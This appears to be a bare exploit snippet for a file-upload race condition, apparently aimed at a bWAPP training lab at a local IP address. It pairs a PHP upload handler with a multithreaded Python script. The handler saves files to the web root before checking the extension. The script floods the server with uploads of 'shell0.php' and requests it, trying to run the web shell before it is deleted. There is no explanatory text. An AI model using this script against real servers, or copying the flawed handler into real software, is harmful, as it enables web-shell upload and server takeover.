<html>
<body>
<form action="upload_file.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
<?php
2 $allowtype = array("gif","png","jpg");
3 $size = 10000000;
4 $path = "./";
5
6 $filename = $_FILES['file']['name'];
7
8 if(is_uploaded_file($_FILES['file']['tmp_name'])){
9 if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
10 die("error:can not move");
11 }
12 }else{
13 die("error:not an upload file!");
14 }
15 $newfile = $path.$filename;
16 echo "file upload success.file path is: ".$newfile."\n<br />";
17
18 if($_FILES['file']['error']>0){
19 unlink($newfile);
20 die("Upload file error: ");
21 }
22 $ext = array_pop(explode(".",$_FILES['file']['name']));
23 if(!in_array($ext,$allowtype)){
24 unlink($newfile);
25 die("error:upload the file type is not allowed,delete the file!");
26 }
27 ?>
#!/usr/bin/python
import os
import requests
import threading
class RaceUpload(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.url = 'http://192.168.0.112/bWAPP/shell0.php'
self.uploadUrl = 'http://192.168.0.112/bWAPP/upload_file.php'
def _get(self):
print('try to call uploaded file...')
r = requests.get(self.url)
if r.status_code == 200 :
print("[*]create file info.php success")
os.__exit(0)
def _upload(self):
print("upload file.....")
file = {"file":open("/Library/WebServer/Documents/shell0.php","rb"),}
requests.post(self.uploadUrl,files = file)
def run(self):
while True:
for i in range(5):
self._get()
for i in range(10):
self._upload()
self._get()
if __name__ == "__main__" :
threads = 20
for i in range(threads):
t = RaceUpload()
t.start()
for i in range(threads):
t.join()